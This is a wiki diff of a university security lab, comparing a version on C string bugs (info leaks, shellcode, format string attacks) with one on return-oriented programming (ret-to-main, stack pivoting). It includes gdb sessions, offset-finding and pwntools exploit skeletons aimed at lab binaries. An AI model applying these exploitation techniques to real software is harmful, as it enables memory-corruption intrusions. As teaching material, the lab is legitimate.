Differences

This shows you the differences between two versions of the page.

Link to this comparison view

cns:labs:lab-09 [2017/12/04 17:16]
razvan.deaconescu [[3.5p] Information Leak]
cns:labs:lab-09 [2022/12/05 13:36] (current)
mihai.dumitru2201 [Tasks]
Line 1: Line 1:
-====== Lab 09 - Strings ​======+====== Lab 09 - Return-Oriented Programming (Part 2) ======
  
-===== Resources ​=====+===== Introduction ​=====
  
-  * [[http://www.cert.org/​books/​secure-coding/​|Secure Coding in C and C++]] +In this lab, we will resume from where we left off our [[http://ocw.cs.pub.ro/courses/cns/labs/lab-10|last session]].
-  * [[http://​www.informit.com/articles/article.aspx?​p=2036582|String representation in C]] +
-  * [[https://www.owasp.org/​index.php/​Improper_string_length_checking|Improper string length checking]] +
-  * [[http://​cwe.mitre.org/​data/​definitions/​134.html|Format String definition]],​ [[https://​www.owasp.org/​index.php/​Format_string_attack|Format String Attack ​ (OWASP)]], [[http://​projects.webappsec.org/​w/​page/​13246926/​Format%20String|Format String Attack (webappsec)]] ​  +
-  * [[http://​www.gratisoft.us/​todd/​papers/​strlcpy.html|strlcpy and strlcat - consistent, safe, string copy and concatenation.]] This resource is useful to understand some of the string manipulation problems.+
  
-===== Lab Support Files =====+In many real-life cases you will encounter, a vulnerability will consist of a small buffer overflow, which will not allow you to chain a list of gadgets of arbitrary length. However, there are techniques to circumvent this. Today, we will look at two of these techniques.
  
-We will use this [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]] throughout the lab.+==== Ret-to-vuln ====
  
-Please download the lab archive an then unpack it using the commands below: +Should you need to ret to multiple functions, but you only have space for two or three, ​then you can choose to return to ''​main''​ again, or to the function in which the bug is present.
-<code bash> +
-student@mjolnir:​~$ wget http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz +
-student@mjolnir:​~$ tar xzf lab-09.tar.gz +
-</​code>​+
  
-After unpacking we will get the ''​lab-09/''​ folder that we will use for the lab: +==== Stack pivoting ====
-<code bash> +
-student@mjolnir:​~$ cd lab-09/ +
-student@mjolnir:​~/​lab-09$ ls +
-basic-format-string ​ basic-info-leak +
-format-string ​ info-leak +
-printf-features ​ string-shellcode +
-</​code>​+
  
-===== Intro =====+A more elegant solution is to "​pivot"​ the stack. Suppose there are additional constraints imposed such that it is impossible to return and repeat the overflow.
  
-This is a tutorial based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial is focused on the C language. GenerallyOOP languages (like Java, C#, C++) are using classes to represent strings ​-- this simplifies the way strings are handled and decreases the frequency of programming errors.+Pivoting ​the stack basically means getting ''​RSP''​ to point elsewhere in memorypreferably a read-writable location which we control.
  
-===== What is string? =====  ​+Supposing we find such region in memory, we can simply return to a ''​call read''​ and simulate a call to ''​read(0,​ pivot, size);''​. The ''​pivot''​ address will contain a fabricated stack containing a ropchain of (nearly) arbitrary size.
  
-Conceptually, ​string is sequence of characters. The representation of a string can be done in multiple ways. One of the way is to represent a string as a contiguous ​memory ​buffer. Each character is **encoded** in a way. For example ​the **ASCII** encoding uses 7-bit integers ​to encode each character -- because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte.+But how do we get ''​RSP''​ to point to different region ​in memory? If you think about the ''​leave''​ instruction,​ which roughly does the following, you will begin to see an answer:
  
-The type for representing an ASCII character in C is ''​char''​ and it uses one byte. As a side note, ''​sizeof(char) == 1''​ is the only guarantee that the [[http://​www.open-std.org/​jtc1/​sc22/​WG14/​www/​docs/​n1256.pdf|C standard]] gives. +<code asm
- +mov rsp, rbp 
-Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). The idea is that in order to represent an Unicode string, **more than one** byte is needed for **one** character. ''​char16_t'',​ ''​char32_t''​ were introduced in the C standard to represent these strings. The C language also has another type, called ''​wchar_t'',​ which is implementation defined and should not be used to represent Unicode characters. +pop rbp
- +
-Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls //string manipulation functions// that are assuming a specific encoding of the string. +
- +
-<note+
-You will find extensive information on ASCII in the [[http://​man7.org/​linux/​man-pages/​man7/​ascii.7.html|ascii man page]]. Inside an Unix terminal issue the command<​code bash> +
-man ascii+
 </​code>​ </​code>​
-</​note>​ 
  
-===== Length management =====+Hence, when we overwrite the stored frame pointer, we can set its value to where we'll want ''​ESP''​ to point to.
  
-In C, the length of an ASCII string is given by its contents. An ASCII string ends with a ''​0''​ value byte called the ''​NUL''​ byte. Every ''​str*''​ function (i.e. a function with the name starting with ''​str'',​ such as ''​strcpy'',​ ''​strcat'',​ ''​strdup'',​ ''​strstr''​ etc.) uses this ''​0''​ byte to detect where the string ends. As a result, not ending strings in ''​0''​ and using ''​str*''​ functions leads to vulnerabilities.+===== Tasks =====
  
-==== [1pBasic Info Leak (tutorial) ====+All content necessary for the CNS laboratory tasks can be found in [[cns:​resources:​repo|the CNS public repository]]
  
-Enter the ''​basic-info-leak/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]]. It's a basic information leak example. 
  
-In ''​basic_info_leak.c'',​ ''​buf''​ is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives ''​32''​ bytes as input then ''​strcpy''​ will copy bytes in ''​my_string''​ until it finds a ''​NUL''​ byte (''​0x00''​). Because the [[cns:​labs:​lab-05|stack grows down]], on most platforms, we will start accessing the content of the stack. After the ''​buf''​ variable the stack stores the ''​old ebp'',​ the function return address and then the function parameters. This information is copied into ''​my_string''​. As such, printing information in ''​my_string''​ (after byte index ''​32''​) using ''​puts()''​ results in information leaks. 
  
-We can test this using: +==== 1Return to main ====
-<​code>​ +
-$ python -c 'print "​A"​*32'​ | ./​basic_info_leak  +
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX����� +
-</​code>​+
  
-In order to check the hexadecimal values of the leak, we pipe the output through ​''​xxd'':​ +Inspect ​the source file ''​ret_to_main.c''​. ​See if you can spot the vulnerability.
-<​code>​ +
-$ python -c 'print "​A"​*32' ​./​basic_info_leak | xxd +
-00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA +
-00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA +
-00000020: 786d 99ff f184 0408 0a +
-</​code>​+
  
-We have leaked two values above: +The goal of the task is to get the contents of the ''​flag'' ​file through ​the binary. In order to do this, we need to chain three functions together.
-  * the old/stored ''​ebp''​ value (right after the buffer): ​''​0xff996d78'' ​(it's a little endian architecture);​ it will differ on your system +
-  * the ''​my_main()''​ return address: ''​0x080484f1''​+
  
-The return address usually doesn'​t change (except for executables with PIE, //Position Independent Executable//​ support). But assuming ASLR is enabled, the ''​ebp''​ value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We'll see more of that in the [[#​p_information_leak|Information Leak]] task. +=== TutorialFinding the return address offset  ​===
-==== [2.5p] RecapString Shellcode ====+
  
-For starters, let's do a recap on creating a shellcode-based attack and exploiting ​string-based vulnerability.+<code asm> 
 +# gdb ./​ret_to_main 
 +gdb-peda$ pattc 0x40 
 +'AAA%AAsAABAA$AAnAACAA-AA(AADAA;​AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'​ 
 +gdb-peda$ r 
 +Starting program: /​cns/​lab-11/​sol/​ret_to_main 
 +Welcome to our Retired Old Programmers message board! 
 +Please leave message: 
 +AAA%AAsAABAA$AAnAACAA-AA(AADAA;​AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH
  
-In the ''​string-shellcode/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]] you have a vulnerable executable dubbed ​''​string_shellcode''​. The original source code is ''​string_shellcode.c''​. There is an obvious vulnerability when using ''​strcpy()'' ​that will lead to an overflow and a rewrite of the ''​get_num_alpha()''​ function return address when called with a large enough number of characters in ''​g_buffer''​. +Program received signal SIGSEGV, Segmentation fault. 
- +[----------------------------------registers-----------------------------------] 
-Fill the ''​TODO''​ spots in the ''​exploit.py''​ script to inject and execute a shell. +RAX: 0x40 ('@'
- +RBX: 0x0 
-<note tip+RCX: 0x7ffff7ee1881 ​(<​__GI___libc_read+17>: ​    ​cmp ​   rax,​0xfffffffffffff000) 
-ASLR is on. The ''​shellcode''​ will be stored at the beginning of the ''​g_buffer''​ global variable which has a constant address. You can determine it using+RDX: 0x40 ('@'
-<​code>​ +RSI: 0x7fffffffe490 ​("​AAA%AAsAABAA$AAnAACAA-AA(AADAA;​AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH\310\345\377\377\377\177"​
-nm string_shellcode ​grep ' g_buffer'​+RDI: 0x0 
 +RBP: 0x4147414131414162 ('bAA1AAGA') 
 +RSP: 0x7fffffffe4c8 ("​AcAA2AAH\310\345\377\377\377\177"​) 
 +RIP: 0x4012b4 (<play+55>:       ret) 
 +R8 : 0x19 
 +R9 : 0x7ffff7f315e0 (<​__memcpy_ssse3+6720>: ​    ​mov ​   r10,QWORD PTR [rsi-0x18]) 
 +R10: 0x400443 --> 0x6474730064616572 ('read'
 +R110x246 
 +R12: 0x401090 (<_start>: ​       xor    ebp,ebp) 
 +R13: 0x7fffffffe5c0 --> 0x1 
 +R14: 0x0 
 +R15: 0x0 
 +EFLAGS: 0x10203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow) 
 +[-------------------------------------code-------------------------------------] 
 +   ​0x4012a9 <play+44>:  mov    edi,0x0 
 +   0x4012ae <​play+49>: ​ call   ​0x401050 <​read@plt>​ 
 +   ​0x4012b3 <​play+54>: ​ leave 
 +=> 0x4012b4 <​play+55>: ​ ret 
 +   ​0x4012b5 <​main>: ​    ​push ​  rbp 
 +   ​0x4012b6 <​main+1>: ​  ​mov ​   rbp,rsp 
 +   ​0x4012b9 <​main+4>: ​  ​sub ​   rsp,0x10 
 +   ​0x4012bd <​main+8>: ​  ​mov ​   DWORD PTR [rbp-0x4],​edi 
 +[------------------------------------stack-------------------------------------] 
 +00000x7fffffffe4c8 ("​AcAA2AAH\310\345\377\377\377\177"​) 
 +0008| 0x7fffffffe4d0 --> 0x7fffffffe5c8 --> 0x7fffffffe7fa ("/​cns/​lab-11/​sol/​task1"​) 
 +0016| 0x7fffffffe4d8 --> 0x100000000 
 +0024| 0x7fffffffe4e0 --> 0x4012e0 (<​__libc_csu_init>: ​  ​push ​  ​r15) 
 +0032| 0x7fffffffe4e8 --> 0x7ffff7e1cbbb (<​__libc_start_main+235>: ​      ​mov ​   edi,eax) 
 +0040| 0x7fffffffe4f0 --> 0x7ffff7fac4d8 --> 0x7ffff7e1c4a0 (<​init_cacheinfo>: ​ push   ​r15) 
 +0048| 0x7fffffffe4f8 --> 0x7fffffffe5c8 --> 0x7fffffffe7fa ("/​cns/​lab-11/​sol/​task1"​) 
 +0056| 0x7fffffffe500 --> 0x1f7f795a8 
 +[------------------------------------------------------------------------------] 
 +Legend: code, data, rodata, value 
 +Stopped reason: SIGSEGV 
 +0x00000000004012b4 in play () 
 +gdb-peda$ 
 +gdb-peda$ patto bAA1AAGA 
 +bAA1AAGA found at offset: 48
 </​code>​ </​code>​
-</​note>​ 
  
-<note tip> +Our ''​$rbp'' ​is at offset ​48  => the return address ​will be at offset 56.
-Use GDB PEDA and ''​pattc'' ​and ''​patto''​ to determine the offset ​between ''​l_buffer''​ and the ''​get_num_alpha()''​ function ​return address.+
  
-In GDB/PEDA in order to send a given string (such as the pattern outputted by ''​pattc''​) ​to the program standard input, use the process substitution construct:​ +=== Tutorial: Opening ​the flag file and returning ​to main ===
-<​code>​ +
-gdb-peda$ r < <(echo '​AAAA.....'​) +
-</​code>​ +
-</​note>​+
  
-<note tip> +Let's think about how a small ropchain needs to look like if we want to: 
-Construct the ''​payload''​ as usualadd the shellcode, add padding and overwrite the ''​get_num_alpha()'' ​function ​return address with the address of the shellcode (i.ethe address of the ''​g_buffer''​) global variable. +1. Return to the function ​which opens the flag file. 
-</​note>​ +2. Pass it the correct argument. 
-==== [3.5p] Information Leak ==== +3Return to ''​main'' ​afterwards.
  
-We will now show how improper string handling will lead to information leaks from the memory. For this, please access the ''​info-leak/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]]. Please browse the ''​info-leak.c''​ source code file. The executable file is already generated in ''​info-leak''​ (a 32-bit ELF file). 
-  
-The snippet below is the relevant code snippet. The goal is to call the ''​my_evil_func()''​ function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the ''​my_evil_func()''​ function by overriding the return address of the ''​my_main()''​ function: 
  
-<code C> +We'll need to save a few useful addresses:
-#define NAME_SZ 32 +
- +
-static void read_name(char *name) +
-+
- memset(name,​ 0, NAME_SZ); +
- read(0, name, NAME_SZ); +
- //​name[NAME_SZ-1] = 0; +
-+
- +
-static void my_main(void) +
-+
- char name[NAME_SZ];​ +
- +
- read_name(name);​ +
- printf("​hello %s, what address to modify and with what value?​\n",​ name); +
- fflush(stdout);​ +
- my_memory_write();​ +
- printf("​Returning from main!\n"​);​ +
-+
-</​code>​ +
- +
-What catches our eye is that the ''​read()''​ function call in the ''​read_name()''​ function read **exactly** ''​32''​ bytes. If we provide it ''​32''​ bytes it won't be null-terminated and will result in an information leak when ''​printf()''​ is called in the ''​my_main()''​ function. +
- +
-=== Exploiting the memory write using the info leak === +
- +
-Let's first try to see how the program works:+
 <code bash> <code bash>
-$ python -c '​import sys; sys.stdout.write(10*"A"​)' ​./​info_leak ​ +# nm ret_to_main | egrep "main|stop|right|there|play"​ 
-hello AAAAAAAAAA, what address to modify and with what value? +                 
-</​code>​+00000000004012b5 T main 
 +000000000040127d T play 
 +00000000004011da T right 
 +0000000000401172 T stop 
 +000000000040124b T there
  
-The binary wants an input from the user using the ''​read()''​ library call as we can see below: 
-<code bash> 
-$ python -c '​import sys; sys.stdout.write(10*"​A"​)'​ | strace -e read ./info_leak 
-strace: [ Process PID=7736 runs in 32 bit mode. ] 
-read(3, "​\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"​...,​ 512) = 512 
-read(0, "​AAAAAAAAAA",​ 32)               = 10 
-hello AAAAAAAAAA, what address to modify and with what value? 
-read(0, "",​ 4)                          = 0 
-+++ exited with 255 +++ 
 </​code>​ </​code>​
  
-The input is read using the ''​read()''​ system call. The first read expects 32 bytes. You can see already that there'​s ​another ''​read()''​ call. That one is the first ''​read()''​ call in the ''​my_memory_write()''​ function.+Let'​s ​start writing our exploit script.
  
-As noted above, if we use exactly ''​32''​ bytes for name we will end up with a non-null-terminated string, leading to an information leak. Let's see how that goes: +<​code ​python
-<​code ​bash+#​!/​usr/​bin/​env ​python 
-python ​-c 'import ​sys; sys.stdout.write(32*"​A"​)'​ | ./​info_leak +from pwn import *
-hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���,​ what address to modify and with what value?+
  
-$ python -c '​import sys; sys.stdout.write(32*"​A"​)' ​./info_leak | xxd +io = process('./ret_to_main'​)
-00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141  hello AAAAAAAAAA +
-00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA +
-00000020: 4141 4141 4141 58da e0ff 0586 0408 2c20  AAAAAAX.......,​  +
-00000030: 7768 6174 2061 6464 7265 7373 2074 6f20  what address to  +
-00000040: 6d6f 6469 6679 2061 6e64 2077 6974 6820  modify and with  +
-00000050: 7768 6174 2076 616c 7565 3f0a            what value?. +
-</​code>​+
  
-We see we have an information leak. We leak two pieces of data above: ''​0xff30da58''​ (little endian representation) and ''​0x08048605''​. The first one seems to be a stack address and the second one a code/text address.+# Useful values 
 +ret_offset = 56 
 +main_addr = 0x4012b5 
 +play_addr = 0x40127d 
 +open_flag = 0x401172
  
-If we run multiple times we can see that the values for the first piece of information differs: +# Construct payloads 
-<code bash> +payload_to_ret = '​A'​*ret_offset
-$ python -c 'import sys; sys.stdout.write(32*"​A")' ​| ./info_leak | xxd | grep ','​ +
-00000020: 4141 4141 4141 18e8 9fff 0586 0408 2c20  AAAAAA........, ​+
  
-$ python -c '​import sys; sys.stdout.write(32*"​A"​)' | ./info_leak | xxd | grep ','​ +payload1 = payload_to_ret 
-00000020: 4141 4141 4141 4879 ccff 0586 0408 2c20  AAAAAAHy......, ​+payload1 += TODO (pop rdi gadget)  
 +payload1 += p64(open_key) 
 +payload1 += p64(open_flag) 
 +payload1 += p64(main_addr)
  
-$ python -c '​import sys; sys.stdout.write(32*"​A"​)'​ | ./info_leak | xxd | grep ','​ 
-00000020: 4141 4141 4141 9867 9bff 0586 0408 2c20  AAAAAA.g......,​ 
-</​code>​ 
  
-The variable part is related to a stack address (it starts with ''​0xff''​);​ it varies because ASLR is enabled. We want to look more carefully using GDB and figure out what the variable value represents: 
-<code bash> 
-$ gdb -q ./info_leak 
-Reading symbols from ./​info_leak...done. 
-gdb-peda$ b printf 
-Breakpoint 1 at 0x80483c0 
-gdb-peda$ r < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​) 
-Starting program: /​home/​razvan/​school/​2012-2013/​oss/​repo.git/​labs/​lab-09/​info-leak/​info_leak < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​) 
-[...] 
  
-Breakpoint 1, 0xf7e2a8f0 in printf () from /​lib/​i386-linux-gnu/​libc.so.6 +io.recvline() 
-gdb-peda$ bt +io.recvline() 
-#0  0xf7e2a8f0 in printf ​() from /​lib/​i386-linux-gnu/​libc.so.6 +io.sendline(payload1)
-#1  0x080485d7 in my_main () at info_leak.c:43 +
-#2  0x08048605 in main () at info_leak.c:​51 +
-#3  0xf7df9276 in __libc_start_main () from /​lib/​i386-linux-gnu/​libc.so.6 +
-#4  0x08048451 in _start ​() +
-gdb-peda$ up +
-#1  0x080485d7 in my_main () at info_leak.c:​43 +
-43 printf("​hello %s, what address to modify and with what value?​\n",​ name); +
-gdb-peda$ x/12wx name +
-0xffffd270:​ 0x41414141 0x41414141 0x41414141 0x41414141 +
-0xffffd280:​ 0x41414141 0x41414141 0x41414141 0x41414141 +
-0xffffd290:​ 0xffffd298 0x08048605 0x00000000 0xf7df9276 +
-gdb-peda$ x/2i 0x08048605 +
-   ​0x8048605 <​main+8>:​ push ​  ​0x8048710 +
-   ​0x804860a <​main+13>:​ call ​  ​0x80483e0 <​puts@plt>​ +
-gdb-peda$ pdis main +
-Dump of assembler code for function main: +
-   ​0x080485fd <​+0>:​ push ​  ebp +
-   ​0x080485fe <​+1>:​ mov ​   ebp,esp +
-   ​0x08048600 <​+3>:​ call ​  ​0x80485b7 <​my_main>​ +
-   ​0x08048605 <​+8>:​ push ​  ​0x8048710 +
-   ​0x0804860a <​+13>:​ call ​  ​0x80483e0 <​puts@plt>​ +
-   ​0x0804860f <​+18>:​ add ​   esp,0x4 +
-   ​0x08048612 <​+21>:​ mov ​   eax,0x0 +
-   ​0x08048617 <​+26>:​ leave ​  +
-   ​0x08048618 <​+27>:​ ret ​    +
-End of assembler dump. +
-gdb-peda$ ​  +
-</​code>​+
  
-From the GDB above, we determine that, after our buffer, there are two values: one value is the stored ''​ebp''​ (i.e. old ebp) and one value is the return address of the ''​my_main()''​ function (that gets it back to ''​main()''​). +io.interactive()
- +
-When we leak the two values we are able to retrieve the stored ''​ebp''​ value. In the above run the value of ''​ebp''​ is ''​0xffffd298''​. We also see that the stored ''​ebp''​ value is stored at **address** ''​0xffffd290'',​ which is the address current ''​ebp''​. We have the situation in the below diagram: +
- +
-{{ :​cns:​labs:​info-leak-stack.png?​600 |}} +
- +
-We marked the stored ''​ebp''​ value (i.e. the frame pointer for ''​main()'':​ ''​0xffffd298''​) with the font color red in both places. +
- +
-In short, if we leak the value of the stored ''​ebp''​ (i.e. the frame pointer for ''​main()'':​ ''​0xffffd298''​) we can determine the address where the current ''​ebp''​ (i.e. the frame pointer for ''​my_main()'':​ ''​0xffffd290''​) by subtracting ''​8''​. The address where the ''​my_main()''​ return address is stored (''​0xffffd294''​) is computed by subtracting ''​4''​ from the leaked ''​ebp''​ value. By overwriting the value at this address we will force an arbitrary code execution and call ''​my_evil_func()''​. +
- +
-In order to write the the return address of the ''​my_main()''​ function with the address of the ''​my_evil_func()''​ function, make use of the conveniently (but not realistically) placed ''​my_memory_write()''​ function. +
- +
-Considering all of this, update the ''​TODO''​ lines of the ''​exploit.py''​ script to make it call the ''​my_evil_func()''​ function. +
- +
-<note tip> +
-Same as above, use ''​nm''​ to determine address of the ''​my_evil_func()''​ function. +
-</​note>​ +
- +
-<note tip> +
-Use the above logic to determine the ''​old ebp''​ leak and then the address of the ''​my_main()''​ return address. +
-</​note>​ +
- +
-<note tip> +
-See [[https://​docs.pwntools.com/​en/​stable/​util/​packing.html#​pwnlib.util.packing.unpack|here]] examples of using the ''​unpack()''​ function. +
-</​note>​ +
- +
-<note tip> +
-In case of a successful exploit the program will return with the ''​42''​ error code in the ''​my_evil_func()''​ function, same as below: +
-<​code>​ +
-$ python exploit.py  +
-[+] Starting local process '​../​info_leak':​ Done +
-[*] old_ebp is 0xffd66228 +
-[*] return address is located at is 0xffd66224 +
-[*] Process '​../​info_leak'​ stopped with exit code 42+
 </​code>​ </​code>​
-</​note>​ 
- 
-<note important>​ 
-The rule of thumb is: **Always know your string length.** 
-</​note>​ 
- 
-===== Format String Attacks ===== 
- 
-We will now see how (im)proper use of ''​printf''​ may provide us with ways of extracting information or doing actual attacks. 
  
-Calling ​''​printf''​ or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**.+Let's test this code to see if it works:
  
-The definition of ''​printf'':​ 
 <code bash> <code bash>
-int printf(const char *format, ​...);+./test.py  
 +[+] Starting local process '​./​ret_to_main':​ Done 
 +[*] Switching to interactive mode 
 +-> secret vault opened 
 +Welcome to our Retired Old Programmers message board! 
 +Please leave a message:  
 +$  
 +[*] Stopped program './​ret_to_main'​
 </​code>​ </​code>​
  
-Let's recap some of [[http://​www.cplusplus.com/​reference/​cstdio/​printf/​|useful formats]]:+=== Reading and printing the flag  ===
  
-  * %08x -- prints a number in hex formatmeaning takes a number from the stack and prints in hex format +Build two more similar payloads to sendone to return to the function which reads the contents of the flag and another which prints the flag. Remember ​to return ​to ''​main'' ​in order to be able to chain the two together.
-  * %s -- prints a string, meaning takes a pointer from the stack and prints the string from that address +
-  * %n -- writes the number of bytes written so far to the address given as a parameter ​to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard.+
  
-''​%x''​ and ''​%n''​ are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user.+==== 2Stack pivoting ​ ====
  
-==== Example 2 ====+For this task, we will be using the same binary. This time, we will pivot the stack before supplying our ROP chain.
  
-<code C> +=== Tutorial: Finding a place to pivot  ===
-printf(my_string);​ +
-</​code>​+
  
-The above snippet is a good example ​of why ignoring compile time warnings is dangerous. The given example is easily detected by static checker.+We can use ''​gdb-peda''​ to see the memory mappings ​of a binary at runtime.
  
-Try to think about: +<code asm> 
- +gdb-peda$ start 
-  * The peculiarities of ''​printf''​ (variable number of arguments) +gdb-peda$ vmmap 
-  * Where ''​printf''​ stores its arguments (//hint//: on the stack) +Start              End                Perm Name 
-  * What happens when ''​my_string''​ is ''​%%"​%x"​%%''​ +0x00400000 ​        ​0x00403000 ​        ​r-xp task1 
-  * How matching between format strings (e.gthe one above) and arguments is enforced (//hint//: it's not) and what happens in general when the number of arguments doesn'​t match the number of format specifiers +0x00403000 ​        ​0x00404000 ​        ​r-xp task1 
-  * How we could use this to cause information leaks and arbitrary memory writes (//hint//: see the format specifiers at the beginning of the section) +0x00404000 ​        ​0x00405000 ​        ​rw-p task1 
- +0x00007ffff79e4000 0x00007ffff7bcb000 r-xp /lib/x86_64-linux-gnu/libc-2.27.so 
-==== [1pExample 3 ==== +0x00007ffff7bcb000 0x00007ffff7dcb000 ---p /lib/x86_64-linux-gnu/libc-2.27.so 
- +0x00007ffff7dcb000 0x00007ffff7dcf000 r-xp /lib/​x86_64-linux-gnu/​libc-2.27.so 
-We would like to check some of the well known and not so-well known features of [[http://man7.org/linux/man-pages/​man3/​printf.3.html|the printf function]]. Some of them may be used for information leaking and for attacks such as format string attacks+0x00007ffff7dcf000 0x00007ffff7dd1000 rwxp /lib/x86_64-linux-gnu/libc-2.27.so 
- +0x00007ffff7dd1000 0x00007ffff7dd5000 rwxp mapped 
-Go into ''​printf-features/''​ subfolder and browse the ''​printf-features.c''​ fileCompile the executable file using:<​code bash> +0x00007ffff7dd5000 0x00007ffff7dfc000 r-xp /lib/​x86_64-linux-gnu/​ld-2.27.so 
-make +0x00007ffff7fd3000 0x00007ffff7fd5000 rwxp mapped 
-</​code>​ +0x00007ffff7ff7000 0x00007ffff7ffa000 r--p [vvar
-and then run the resulting executable file using<​code bash> +0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp [vdso] 
-./printf-features+0x00007ffff7ffc000 0x00007ffff7ffd000 r-xp /lib/x86_64-linux-gnu/ld-2.27.so 
 +0x00007ffff7ffd000 0x00007ffff7ffe000 rwxp /​lib/​x86_64-linux-gnu/ld-2.27.so 
 +0x00007ffff7ffe000 0x00007ffff7fff000 rwxp mapped 
 +0x00007ffffffde000 0x00007ffffffff000 rwxp [stack] 
 +0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall]
 </​code>​ </​code>​
  
-Go through the ''​printf-features.c'' ​file again and check how printlength and conversion specifiers are used by ''​printf''​. We will make use of the ''​%n''​ feature that allows memory writes, a requirement for attacks. +The region beginning at ''​0x00404000'' ​looks suitablebut just to be safe, let'​s ​not choose ​the starting ​address.
- +
-==== [2p] Basic Format String Attack ==== +
- +
-You will now do a basic format string attack using the ''​basic-format-string/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]]. The source code is in ''​basic_format_string.c''​ and the executable is in ''​basic_format_string''​. +
- +
-You need to use ''​%n''​ to overwrite the value of the ''​v''​ variable to ''​100''​. You have to do three steps: +
-  - Determine the address of the ''​v''​ variable using ''​nm''​. +
-  - Determine the ''​n''​-th parameter of ''​printf()''​ that you can write to using ''​%n''​. The ''​buffer''​ variable will have to be that parameter; you will store the address of the ''​v''​ variable in the ''​buffer''​ variable. +
-  - Construct a format string that enables the attack; the number of characters processed by ''​printf()''​ until ''​%n''​ is matched will have to be ''​100''​. +
- +
-For the second step let'​s ​run the program multiple times and figure out where the ''​buffer'' ​address ​starts. We fill ''​buffer''​ with the ''​aaaa''​ string and we expect to discover it using the ''​printf()''​ format specifiers.+
  
 <​code>​ <​code>​
-./basic_format_string ​ +gdb-pedax/100g 0x00404000 
-aaaa +0x404000:​ 0x0000000000403e20 0x00007ffff7ffe170 
-%llx%llx%llx%llx%llx +0x404010:​ 0x00007ffff7dec680 0x0000000000401036 
-f76f65a0ffd559a0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f75718700000000a+0x404020:​ 0x0000000000401046 0x0000000000401056 
 +0x404030:​ 0x0000000000401066 0x0000000000401076 
 +0x404040:​ 0x0000000000401086 0x0000000000000000 
 +0x404050:​ 0x0000000000000000 0x0000000000000000 
 +0x404060 <​stdout@@GLIBC_2.2.5>:​ 0x00007ffff7dd0760 0x0000000000000000
  
-./basic_format_string ​ +gdb-pedax/100g 0x00404400 
-aaaa +0x404400:​ 0x0000000000000000 0x0000000000000000 
-%llx%llx%llx%llx%llx%llx +0x404410:​ 0x0000000000000000 0x0000000000000000 
-f76fa5a0ffc4e5c0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f757000a786c6c25616161610804856b+0x404420:​ 0x0000000000000000 0x0000000000000000 
 +0x404430:​ 0x0000000000000000 0x0000000000000000 
 +0x404440:​ 0x0000000000000000 0x0000000000000000 
 +0x404450:​ 0x0000000000000000 0x0000000000000000 
 +0x404460:​ 0x0000000000000000 0x0000000000000000
  
-$ ./​basic_format_string ​ 
-aaaa 
-%llx%llx%llx%llx%llx%lx 
-f77115a0ffa03f30786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f758c8000a786c25804856b 
- 
-$ ./​basic_format_string ​ 
-aaaa 
-%llx%llx%llx%llx%llx%lx%lx 
-f77535a0fffef1d0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25a786c25786c25804856b61616161 
 </​code>​ </​code>​
  
-In the last run we get the ''​61616161''​ representation ​of ''​aaaa''​. That means that, if we replace ​the final ''​%lx''​ with ''​%n''​we will write the address ''​0x61616161''​ the number of characters processed so far: +Apart from the reason that values are not zero at the starting address, there's also the risk of the stack pointer going off bounds into values lower than the starting addresswhere there is no write permission.
-<​code>​ +
-$ echo -n '​f77535a0fffef1d0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25a786c25786c25804856b'​ | wc -c +
-84 +
-</​code>​+
  
-We need that number to be ''​100''​. You can fine tune the format string by using a construct such as ''​%32llx''​ to print a number on ''​32''​ characters instead of a maximum of ''​16''​ characters. See how much extra room you need and see if you reach ''​100''​ bytes.+=== Tutorial: First stage payload ​ ===
  
-<note important>​ +We need to find sequence ​of instructions akin to:
-The construct needn'​t use multiple ​of ''​8''​ for length. You may use the ''​%32llx''​ or ''​%33llx''​ or ''​%42llx''​. The numeric argument states the length of the print output. +
-</​note>​ +
- +
-After the plan is complete, write down the attack by filling the ''​TODO''​ lines in the ''​exploit.py''​ solution skeleton. +
-==== [3p] ExtraFormat String Attack ====+
  
-The goal of this task is to call ''​my_evil_func''​ again. This task is also tutorial based. +<​code ​asm
-<​code ​C+call read 
-int +leave 
